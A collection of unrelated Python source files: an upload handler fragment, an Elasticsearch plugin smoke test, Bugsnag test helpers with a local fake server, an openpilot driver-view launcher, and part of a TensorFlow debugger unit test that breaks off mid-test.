arr = np.char.encode(arr, 'utf8')
fh['/meta/' + key] = arr
entry['metadata'].append(
[key, type(m).__name__, m.display_name(key)])
# Clean up if no metadata was added.
if not entry['metadata']:
del entry['metadata']
# Update the user-uploaded dataset config with the new dataset.
config_path = os.path.join(outdir, 'user_data.yml')
if os.path.exists(config_path):
config = yaml.safe_load(open(config_path))
else:
config = {}
if ds_kind not in config:
config[ds_kind] = {ds_name: entry}
else:
config[ds_kind][ds_name] = entry
with open(config_path, 'w') as fh:
yaml.safe_dump(config, fh, allow_unicode=True)
routes = [
(r'/_upload_spectrum', SpectrumUploadHandler),
(r'/_upload_dataset', DatasetUploadHandler),
]
|
smoke_test_plugins.py | # Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import datetime
import traceback
import json
import os
import shutil
import signal
import socket
import subprocess
import tempfile
import threading
import time
from http.client import HTTPConnection
LOG = os.environ.get('ES_SMOKE_TEST_PLUGINS_LOG', '/tmp/elasticsearch_smoke_test_plugins.log')
print('Logging to %s' % LOG)
if os.path.exists(LOG):
raise RuntimeError('please remove old log %s first' % LOG)
try:
JAVA_HOME = os.environ['JAVA7_HOME']
except KeyError:
try:
JAVA_HOME = os.environ['JAVA_HOME']
except KeyError:
raise RuntimeError("""
Please set JAVA_HOME in the env before running release tool
On OSX use: export JAVA_HOME=`/usr/libexec/java_home -v '1.7*'`""")
JAVA_ENV = 'export JAVA_HOME="%s" PATH="%s/bin:$PATH" JAVACMD="%s/bin/java"' % (JAVA_HOME, JAVA_HOME, JAVA_HOME)
try:
# make sure mvn3 is used if mvn3 is available
# some systems use maven 2 as default
subprocess.check_output('mvn3 --version', shell=True, stderr=subprocess.STDOUT)
MVN = 'mvn3'
except subprocess.CalledProcessError:
MVN = 'mvn'
def log(msg):
f = open(LOG, mode='ab')
f.write(('\n'+msg).encode('utf-8'))
f.close()
def run(command, quiet=False):
log('%s: RUN: %s\n' % (datetime.datetime.now(), command))
if os.system('%s >> %s 2>&1' % (command, LOG)):
msg = ' FAILED: %s [see log %s]' % (command, LOG)
if not quiet:
print(msg)
raise RuntimeError(msg)
def readServerOutput(p, startupEvent, failureEvent):
try:
while True:
line = p.stdout.readline()
if len(line) == 0:
p.poll()
if not startupEvent.isSet():
failureEvent.set()
startupEvent.set()
print('ES: **process exit**\n')
break
line = line.decode('utf-8').rstrip()
if line.endswith('started') and not startupEvent.isSet():
startupEvent.set()
print('ES: %s' % line)
except:
print()
print('Exception reading Elasticsearch output:')
traceback.print_exc()
failureEvent.set()
startupEvent.set()
if __name__ == '__main__':
print('Build release bits...')
run('%s; %s clean package -DskipTests' % (JAVA_ENV, MVN))
for f in os.listdir('core/target/releases/'):
if f.endswith('.tar.gz'):
artifact = f
break
else:
raise RuntimeError('could not find elasticsearch release under core/target/releases/')
tmp_dir = tempfile.mkdtemp()
p = None
try:
# Extract artifact:
run('tar -xzf core/target/releases/%s -C %s' % (artifact, tmp_dir))
es_install_dir = os.path.join(tmp_dir, artifact[:-7])
es_plugin_path = os.path.join(es_install_dir, 'bin/plugin')
installed_plugin_names = set()
print('Find plugins:')
for name in os.listdir('plugins'):
if name not in ('target', 'pom.xml'):
url = 'file://%s/plugins/%s/target/releases/elasticsearch-%s-2.0.0-beta1-SNAPSHOT.zip' % (os.path.abspath('.'), name, name)
print(' install plugin %s...' % name)
run('%s; %s install %s --url %s' % (JAVA_ENV, es_plugin_path, name, url))
installed_plugin_names.add(name)
print('Start Elasticsearch')
env = os.environ.copy()
env['JAVA_HOME'] = JAVA_HOME
env['PATH'] = '%s/bin:%s' % (JAVA_HOME, env['PATH'])
env['JAVA_CMD'] = '%s/bin/java' % JAVA_HOME
startupEvent = threading.Event()
failureEvent = threading.Event()
p = subprocess.Popen(('%s/bin/elasticsearch' % es_install_dir,
'-Des.node.name=smoke_tester',
'-Des.cluster.name=smoke_tester_cluster'
'-Des.discovery.zen.ping.multicast.enabled=false',
'-Des.script.inline=on',
'-Des.script.indexed=on'),
stdout = subprocess.PIPE,
stderr = subprocess.STDOUT,
env = env)
thread = threading.Thread(target=readServerOutput, args=(p, startupEvent, failureEvent))
thread.setDaemon(True)
thread.start()
startupEvent.wait(1200)
if failureEvent.isSet():
raise RuntimeError('ES failed to start')
print('Confirm plugins are installed')
conn = HTTPConnection('127.0.0.1', 9200, 20);
conn.request('GET', '/_nodes?plugin=true&pretty=true')
res = conn.getresponse()
if res.status == 200:
nodes = json.loads(res.read().decode("utf-8"))['nodes']
for _, node in nodes.items():
node_plugins = node['plugins']
for node_plugin in node_plugins:
plugin_name = node_plugin['name']
if plugin_name not in installed_plugin_names:
raise RuntimeError('Unexpeced plugin %s' % plugin_name)
installed_plugin_names.remove(plugin_name)
if len(installed_plugin_names) > 0:
raise RuntimeError('Plugins not loaded %s' % installed_plugin_names)
else:
raise RuntimeError('Expected HTTP 200 but got %s' % res.status)
finally:
if p is not None:
try:
os.kill(p.pid, signal.SIGKILL)
except ProcessLookupError:
pass
shutil.rmtree(tmp_dir)
|
utils.py | import json
import time
import unittest
from threading import Thread
from http.server import SimpleHTTPRequestHandler, HTTPServer
import bugsnag
class MissingRequestError(Exception):
pass
class IntegrationTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.server = FakeBugsnagServer()
def setUp(self):
self.server.received = []
def tearDown(self):
bugsnag.legacy.default_client.uninstall_sys_hook()
client = bugsnag.Client()
client.configuration.api_key = 'some key'
bugsnag.legacy.default_client = client
bugsnag.legacy.configuration = client.configuration
@classmethod
def tearDownClass(cls):
cls.server.shutdown()
def assertSentReportCount(self, count):
self.assertEqual(len(self.server.received), count)
def assertExceptionName(self, received_index, event_index, name):
json_body = self.server.received[received_index]['json_body']
event = json_body['events'][event_index]
exception = event['exceptions'][0]
self.assertEqual(exception['errorClass'], name)
class FakeBugsnagServer(object):
"""
A server which accepts a single request, recording the JSON payload and
other request information
"""
def __init__(self):
self.received = []
self.paused = False
class Handler(SimpleHTTPRequestHandler):
def do_POST(handler):
start = time.time()
while self.paused:
if time.time() > (start + 0.5):
raise Exception('Paused HTTP server timeout')
time.sleep(0.001)
length = int(handler.headers['Content-Length'])
raw_body = handler.rfile.read(length).decode('utf-8')
if handler.path != '/ignore':
self.received.append({'headers': handler.headers,
'json_body': json.loads(raw_body),
'path': handler.path,
'method': handler.command})
handler.send_response(200)
handler.end_headers()
return ()
def log_request(self, *args):
pass
self.server = HTTPServer(('localhost', 0), Handler)
self.server.timeout = 0.5
self.thread = Thread(target=self.server.serve_forever, args=(0.1,))
self.thread.daemon = True
self.thread.start()
@property
def address(self):
return '{0}:{1}'.format(*self.server.server_address)
@property
def url(self):
return 'http://%s' % self.address
def shutdown(self):
self.server.shutdown()
self.thread.join()
self.server.server_close()
def wait_for_request(self, timeout=2):
start = time.time()
while (len(self.received) == 0):
if (time.time() - start > timeout):
raise MissingRequestError("No request received before timeout")
time.sleep(0.25)
class ScaryException(Exception):
pass
|
driverview.py | #!/usr/bin/env python3
import os
import subprocess
import multiprocessing
import signal
import time
import cereal.messaging as messaging
from common.params import Params
from common.basedir import BASEDIR
KILL_TIMEOUT = 15
def send_controls_packet(pm):
while True:
dat = messaging.new_message('controlsState')
dat.controlsState = {
"rearViewCam": True,
}
pm.send('controlsState', dat)
def send_dmon_packet(pm, d):
dat = messaging.new_message('dMonitoringState')
dat.dMonitoringState = {
"isRHD": d[0],
"rhdChecked": d[1],
"isPreview": d[2],
}
pm.send('dMonitoringState', dat)
def main():
pm = messaging.PubMaster(['controlsState', 'dMonitoringState'])
controls_sender = multiprocessing.Process(target=send_controls_packet, args=[pm])
controls_sender.start()
# TODO: refactor with manager start/kill
proc_cam = subprocess.Popen(os.path.join(BASEDIR, "selfdrive/camerad/camerad"), cwd=os.path.join(BASEDIR, "selfdrive/camerad"))
proc_mon = subprocess.Popen(os.path.join(BASEDIR, "selfdrive/modeld/dmonitoringmodeld"), cwd=os.path.join(BASEDIR, "selfdrive/modeld"))
params = Params()
is_rhd = False
is_rhd_checked = False
should_exit = False
def terminate(signalNumber, frame):
print('got SIGTERM, exiting..')
should_exit = True
send_dmon_packet(pm, [is_rhd, is_rhd_checked, not should_exit])
proc_cam.send_signal(signal.SIGINT)
proc_mon.send_signal(signal.SIGINT)
kill_start = time.time()
while proc_cam.poll() is None:
if time.time() - kill_start > KILL_TIMEOUT:
from selfdrive.swaglog import cloudlog
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
continue
controls_sender.terminate()
exit()
signal.signal(signal.SIGTERM, terminate)
while True:
send_dmon_packet(pm, [is_rhd, is_rhd_checked, not should_exit])
if not is_rhd_checked:
is_rhd = params.get("IsRHD") == b"1"
is_rhd_checked = True
if __name__ == '__main__':
main()
|
dumping_callback_test.py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import socket
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import models
from tensorflow.python.keras.applications import mobilenet_v2
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _create_simple_recurrent_keras_model(input_shape):
"""Create a simple tf.keras model containing a recurrent layer for testing."""
model = models.Sequential()
model.add(recurrent_v2.LSTM(
10,
input_shape=input_shape,
kernel_initializer="zeros",
recurrent_initializer="zeros"))
model.add(core.Dense(1, kernel_initializer="zeros"))
model.compile(loss="mse", optimizer="sgd")
return model
_host_name = socket.gethostname()
_current_file_full_path = os.path.abspath(__file__)
class TracingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
def setUp(self):
super(TracingCallbackTest, self).setUp()
self.dump_root = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self.dump_root):
shutil.rmtree(self.dump_root, ignore_errors=True)
dumping_callback.disable_dump_debug_info()
super(TracingCallbackTest, self).tearDown()
def _verifyStackFrames(self, stack_frames):
"""Verify the correctness of the stack frames.
Currently, it simply asserts that the current file is found in the stack
frames.
TODO(cais): Perhaps implement a stricter check later.
Args:
stack_frames: The stack frames to verify.
"""
self.assertTrue([
frame for frame in stack_frames if frame[0] == _current_file_full_path])
def _expectedDefaultDeviceName(self):
gpu_name = test_util.gpu_device_name()
if gpu_name:
return "/job:localhost/replica:0/task:0" + gpu_name
else:
return "/job:localhost/replica:0/task:0/device:CPU:0"
def testInvalidTensorDebugModeCausesError(self):
with self.assertRaisesRegexp(
ValueError,
r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
r"Valid options.*NO_TENSOR.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NONSENSICAL")
def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
dumping_callback.disable_dump_debug_info()
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testPureEagerOpExecution(self, tensor_debug_mode):
"""Test dumping data from eager op execution: float32."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = constant_op.constant(10.0)
zero = constant_op.constant(0.0)
one = constant_op.constant(1.0)
two = constant_op.constant(2.0)
three = constant_op.constant(3.0)
# Use Collatz conjecture as a test case.
while x > one:
if math_ops.equal(x % two, zero):
x = x / two
else:
x = x * three + one
writer.FlushNonExecutionFiles()
self._readAndCheckMetadataFile()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
# Before FlushExecutionFiles() is called, the .execution file should be
# empty.
self.assertFalse(reader.executions())
# After the flushing, the .execution file should hold the appropriate
# contents.
writer.FlushExecutionFiles()
reader.update()
executions = reader.executions()
prev_wall_time = 1
executed_op_types = []
tensor_values = collections.defaultdict(lambda: [])
for execution in executions:
self.assertGreaterEqual(execution.wall_time, prev_wall_time)
prev_wall_time = execution.wall_time
executed_op_types.append(execution.op_type)
# Check the device name.
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
self.assertLen(execution.output_tensor_device_ids, 1)
self.assertEqual(
reader.device_name_by_id(execution.output_tensor_device_ids[0]),
self._expectedDefaultDeviceName(),
"Unexpected device name from eager op %s" % execution.op_type)
# No graph IDs should have been logged for eager op executions.
self.assertFalse(execution.graph_id)
self.assertTrue(execution.input_tensor_ids)
self.assertTrue(execution.output_tensor_ids)
self.assertEqual(
debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
tensor_debug_mode)
if tensor_debug_mode == "NO_TENSOR":
# Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
# be empty.
self.assertFalse(execution.debug_tensor_values)
elif tensor_debug_mode == "CURT_HEALTH":
self.assertLen(execution.debug_tensor_values, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: 0 means there is no inf or nan.
self.assertAllClose(execution.debug_tensor_values, [[-1.0, 0.0]])
elif tensor_debug_mode == "CONCISE_HEALTH":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: each scalar tensor has 1 element.
# Remaining elements: no -inf, inf or nan in these
self.assertAllClose(
execution.debug_tensor_values, [[-1, 1, 0, 0, 0]])
elif tensor_debug_mode == "SHAPE":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: dtype enum value (float32).
# 3rd element: rank (scalar).
# 4th element: element count (4).
# Remaining elements: shape at fixed length (6).
self.assertAllClose(execution.debug_tensor_values,
[[-1, 1, 0, 1, 0, 0, 0, 0, 0, 0]])
elif tensor_debug_mode == "FULL_TENSOR":
tensor_values[execution.op_type].append(
reader.execution_to_tensor_values(execution)[0])
host_name, stack_frames = reader.read_execution_stack_trace(execution)
self.assertEqual(host_name, _host_name)
self._verifyStackFrames(stack_frames)
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
self.assertAllClose(tensor_values["Mul"], [15])
self.assertAllClose(tensor_values["AddV2"], [16])
self.assertEqual(
executed_op_types,
[
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 10 --> 5
"Greater",
"FloorMod",
"Equal",
"Mul",
"AddV2", # 5 --> 16
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 16 --> 8
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 8 --> 4
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 4 --> 2
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 2 --> 1
"Greater"
])
# Due to the pure eager op execution, the .graph file and the
# .graph_execution_traces file ought to be empty.
self.assertFalse(reader.outermost_graphs())
self.assertEqual(reader.num_graph_execution_traces(), 0)
@parameterized.named_parameters(
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testModesSummarizingBadNumericalValue(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return (x + y) / (x - y)
x = np.array([-3, -1, 0, 0, 1, 1, 1, 2], dtype=np.float16)
y = np.array([2, -1, 0, 0, 1, 1, 1, 3], dtype=np.float16)
# (x + y) / (x - y) = [0.2, -inf, nan, nan, inf, inf, inf, -5].
self.evaluate(func(x, y))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
self.assertCountEqual(executed_op_types, ["AddV2", "Sub", "RealDiv"])
if tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: indicates if there is any inf or nan.
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1])
else:
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
elif tensor_debug_mode == "CONCISE_HEALTH":
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: element count (8).
# Remaining 3 elements: The counts of -inf, inf and nan.
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 8, 1, 3, 2])
else:
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 8, 0, 0, 0])
else: # SHAPE.
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (float16 = 19).
# 3rd element: rank (1)
# 4th element: element count (8).
# Remaining elements: shape at fixed length (6).
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 19, 1, 8, 8, 0, 0, 0, 0, 0])
@parameterized.named_parameters(
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testBooleanTensors(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return math_ops.logical_not(math_ops.logical_and(x, y))
x = np.array([[False, False], [True, True]], dtype=np.bool)
y = np.array([[False, True], [False, True]], dtype=np.bool)
self.assertAllEqual(
self.evaluate(func(x, y)), [[True, True], [True, False]])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
self.assertEqual(executed_op_types, ["LogicalAnd", "LogicalNot"])
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (bool).
# 3rd element: rank (2).
# 4th element: element count (4).
# Remaining elements: shape at fixed length.
self.assertAllClose(
trace.debug_tensor_value, [tensor_id, 10, 2, 4, 2, 2, 0, 0, 0, 0])
def testListingSourceFiles(self):
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
# Run a simple eager execution event, so that the source files are dumped.
self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
source_file_list = reader.source_file_list()
self.assertIsInstance(source_file_list, tuple)
for item in source_file_list:
self.assertIsInstance(item, tuple)
self.assertLen(item, 2)
self.assertIn((_host_name, _current_file_full_path), source_file_list)
def testReadingSourceLines(self):
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
# Run a simple eager execution event, so that the source-file contents are
# dumped.
self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
with open(_current_file_full_path, "rt") as f:
file_lines = f.read().split("\n")
self.assertEqual(
reader.source_lines(_host_name, _current_file_full_path), file_lines)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
outermost_graphs = reader.outermost_graphs()
self.assertLen(outermost_graphs, 1)
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, so doesn't get logged to the
# .execution file.
executions = reader.executions()
self.assertLen(executions, 1)
self.assertIn("sin1p_log_sum", executions[0].op_type)
# Get the executed graph and verify its identity and inner graph.
graph = reader.graph_by_id(executions[0].graph_id)
self.assertEqual(graph.name, "sin1p_log_sum")
self.assertLen(graph.inner_graph_ids, 1)
inner_graph = reader.graph_by_id(graph.inner_graph_ids[0])
self.assertEqual(inner_graph.name, "log_sum")
# Check device names.
self.assertLen(executions[0].output_tensor_device_ids, 1)
self.assertEqual(
reader.device_name_by_id(executions[0].output_tensor_device_ids[0]),
self._expectedDefaultDeviceName())
self.assertIn(self._expectedDefaultDeviceName(),
set(reader.device_name_map().values()))
# Verify the recorded graph-building history.
add_op_digests = reader.graph_op_digests(op_type="AddV2")
self.assertLen(add_op_digests, 2)
self.assertEqual(
reader.graph_by_id(add_op_digests[0].graph_id).name, "log_sum")
self.assertEqual(
reader.graph_by_id(add_op_digests[1].graph_id).name, "sin1p_log_sum")
log_op_digests = reader.graph_op_digests(op_type="Log")
self.assertLen(log_op_digests, 1)
self.assertEqual(
reader.graph_by_id(log_op_digests[0].graph_id).name, "log_sum")
sin_op_digests = reader.graph_op_digests(op_type="Sin")
self.assertLen(sin_op_digests, 1)
self.assertEqual(
reader.graph_by_id(sin_op_digests[0].graph_id).name, "sin1p_log_sum")
# Verify the output tensor IDs and the stack traces.
for op_digest in add_op_digests + log_op_digests + sin_op_digests:
# These are all single-output ops.
self.assertLen(op_digest.output_tensor_ids, 1)
self.assertGreaterEqual(op_digest.output_tensor_ids[0], 0)
_, stack_frames = reader.read_graph_op_creation_stack_trace(op_digest)
self._verifyStackFrames(stack_frames)
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [digest.op_type for digest in graph_exec_traces]
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2", "Sin"])
# Verify the graph ID stack of each op.
# 1st AddV2 op.
self.assertEqual(
reader.graph_by_id(graph_exec_traces[0].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(graph_exec_traces[0].graph_ids[-2]).name,
"sin1p_log_sum")
# Log op.
self.assertEqual(
reader.graph_by_id(graph_exec_traces[1].graph_ids[-1]).name,
"log_sum")
self.assertEqual(
reader.graph_by_id(graph_exec_traces[1].graph_ids[-2]).name,
"sin1p_log_sum")
# 2nd AddV2 op.
self.assertEqual(
reader.graph_by_id(graph_exec_traces[2].graph_ids[-1]).name,
"sin1p_log_sum")
# Sin op.
self.assertEqual(
reader.graph_by_id(graph_exec_traces[3].graph_ids[-1]).name,
"sin1p_log_sum")
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for trace in graph_exec_traces:
self.assertIsNone(trace.debug_tensor_value)
elif tensor_debug_mode == "CURT_HEALTH":
# Test the association between graph exec and prior graph building.
# In each case, the 1st element of debug_tensor_value is the ID of the
# symbolic tenosr and the 2nd element is a zero indicating there is no
# inf or nan.
self.assertAllClose(
graph_exec_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 0.0]) # 1st AddV2 op.
self.assertAllClose(
graph_exec_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 0.0]) # Log op.
self.assertAllClose(
graph_exec_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 0.0]) # 2nd AddV2 op.
self.assertAllClose(
graph_exec_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 0.0]) # Sin op.
elif tensor_debug_mode == "CONCISE_HEALTH":
# 1st element: tensor_id, should be >= 0.
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
# 1st AddV2 op.
self.assertAllClose(
graph_exec_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# Log op.
self.assertAllClose(
graph_exec_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# 2nd AddV2 op.
self.assertAllClose(
graph_exec_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# Sin op.
self.assertAllClose(
graph_exec_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
elif tensor_debug_mode == "SHAPE":
# 1st element: tensor_id.
# 2nd element: dtype (float32).
# 3rd element: rank (scalar).
# 4th element: element count (1).
# Remaining elements: shape padded to fixed length (6).
# 1st AddV2 op.
self.assertAllClose(
graph_exec_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# Log op.
self.assertAllClose(
graph_exec_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# 2nd AddV2 op.
self.assertAllClose(
graph_exec_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# Sin op.
self.assertAllClose(
graph_exec_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
else: # FULL_TENSOR.
full_tensor_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
self.assertAllClose(full_tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(full_tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(
full_tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
self.assertAllClose(
full_tensor_values[3], np.sin(np.log(5.0) + 1.0)) # Sin op.
def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
"""Test correct executed IDs of two FuncGraphs from the same Py function."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def ceil_times_two(x):
return math_ops.ceil(x) * 2.0
x_float32 = np.array(3.5, dtype=np.float32)
x_float64 = np.array(4.5, dtype=np.float64)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 4)
for execution in executions:
self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
executed_graph_ids = [execution.graph_id for execution in executions]
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
for executed_graph_id in executed_graph_ids:
self.assertEqual(
reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
"""Two FuncGraphs compiled from Python functions with identical names."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
class TestClass(object):
@def_function.function
def ceil_times_two(self, x):
return math_ops.ceil(x) * 2.0
# The `ceil_times_two` method of the two objects will be compiled
# into separate FuncGraphs.
test_object_1 = TestClass()
test_object_2 = TestClass()
x = np.array(3.5, dtype=np.float32)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
